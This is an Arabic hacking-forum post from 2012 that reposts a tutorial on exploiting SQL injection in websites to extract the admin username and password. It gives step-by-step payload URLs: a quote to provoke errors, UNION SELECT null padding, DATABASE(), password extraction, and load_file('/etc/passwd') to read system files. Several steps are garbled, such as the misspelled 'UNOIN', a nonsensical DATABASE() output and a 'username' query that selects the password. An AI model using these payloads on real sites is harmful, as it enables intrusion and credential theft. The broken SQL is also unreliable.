منتديات الهكر العربي
عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا


منتديات الهكر العربي
 
الرئيسيةاليوميةس .و .جبحـثالمجموعاتالتسجيلدخول

شاطر | 
 

 استغلال المواقع المصابة بثغرة SQL-injection واستخراج يوزر وباسورد الادمن

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
عذب المشاعر
Admin
Admin
avatar

الدولــــــة : العراق الحبيب
الثور
التِنِّين
عدد مواضيعي ومشاركاتي : 181
ذكر
نقاط : 637
التقييم : 2
تاريخ الميلاد : 20/05/1988
تاريخ التسجيل : 13/06/2012
العمر : 29
العمل/الترفيه : الهكر

مُساهمةموضوع: استغلال المواقع المصابة بثغرة SQL-injection واستخراج يوزر وباسورد الادمن   الإثنين يونيو 18, 2012 11:39 pm


السلام عليكم
تنزل مواضيع بالمنتدى
مثل بعض المواقع مصابة بهاي الثغرة انتو تردون لاكن بعضكم لايعرفون ان يستغلوهة ونزل عمر شرح استغلالة وماشاءا الله تعلمو اهواية
وهذا شرح هم للفائدة
منقول بس لتستفيدون انا اكدر اسويلكم شرح بس هذا استخراج يوزرو باسورد

يلا تابع
اول شي خلي اعرفلكم الثغرة
بعدين الشرح
تعريف SQL-injection :-
هي تقنيه المستخدمة للاستفادة من الضعف
اصدار عن اوامر الكترونيه عبر شبكة لتنفيذ التطبيق من قاعدة البيانات
الخلفية ( SQL ) وطبعا المهاجمون يعملون علي الاستفادة الحقيقة من هذا
الضعف للوصول الي المعلومات السريه الخاص بالموقع

الشرح

كود: الموقع المستهدف

http://www.site.com/index.php?id=1
</div>

طبعا لكتشاف الخطاء هنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل
[****]
كود:

1'

</div>

ليكون بالشكل الاتي في HTTP

[****]

كود:
http://www.site.com/index.php?id=1'

</div>


طبعا القاعد لم تستطيع التعرف علي الرمز 1'
هيظهر الخطاء ان الامر خطاء
هيكون
[****]
كود:
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in /home/site/index.php on line N
</div>

خطاء قواعد البيانات في الداله
Warning: mysql_fecth_array():

هنا يمكن الاستغلال مباشر لل SQL-injection
وفي نفس الوقت ظهر لينا مكان الموقع علي السيرفر
home/site/index.php

بنداء دلوقتي في تطبيق SQL-injection
[****]
كود:
UNION SELECT null/*

</div>

UNION والامر هذا يستخدم لإضافة استعلام اخر تابع للاستعلام المصاب بالثغره
SELECT : وهذا الامر عن طريقه يتم استخراج البيانات
Null : وهذا الامر لظبط عدد columns مع القاعده وطبعا بتفضل تزود null للربط بالقاعد
المهم شوف الفديو ده علي لكي تفهم
http://www.wdzone.net/Public/video/MYSQLROOT.rar

المهم بعد كده هنجرب نبداء ب null واحده
[****]

كود:

http://www.site.com/index.php?id=1'UNION SELECT null/*

</div>

للاسف لم تربط بالقاعده هنجرب 2 null
[****]
كود:

http://www.site.com/index.php?id=1'UNION SELECT null,null/*

</div>


كده ربط بالقاعده طيب دلوقتي عايزين نعرف Table في القاعده
بستخدام الامر DATABASE() وهنضيف الداله دفي اخر null
[****]
كود:

http://www.site.com/index.php?id=1'UNION SELECT null,DATABASE()/*

</div>

هيكون الناتج
[****]
كود:

USER()PASSWORD()VERSION()

</div>

طبعا الجداول دي ايوزر بتاع اسم المستخدم و الباسورد بتاع باسورد الادمن
وهيكون الاستعلام لستخراج الباسورد
[****]
كود:


http://www.site.com/index.php?id=1'UNOIN SELECT null,password /*


</div>

و امر استخراج اليوزر
[****]

كود:


http://www.site.com/index.php?id=1'UNOIN SELECT null,password WHERE user='admin' /*

</div>

البعض هيقول طيب SQL-injection فاشله علي شان بتجيب الباسورد MD5
لكن هوريك امر يعتبر فيل انكلود وهو بستخدام الامر load_file()
وهيكون الاستعلام فيه


[****]

كود:
http://www.site.com/index.php?id=1'UNOIN SELECT null,load_file('/etc/passwd')/*



</div>

و الامر ده هيعرض ليك PAsswd يعني يتم الاستغل فيل انكلود وشوف الفديو ده وانت تعرف خطوره الداله file_load
شوف الفديو ده
http://www.wdzone.net/Public/video/INclude.rar


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://www.hackeriraqi.yoo7.com
 
استغلال المواقع المصابة بثغرة SQL-injection واستخراج يوزر وباسورد الادمن
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» boilers by hager mandour

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الهكر العربي :: قسم اختراق المواقع :: قسم اختراق المنتديات والسييرفرات-
انتقل الى: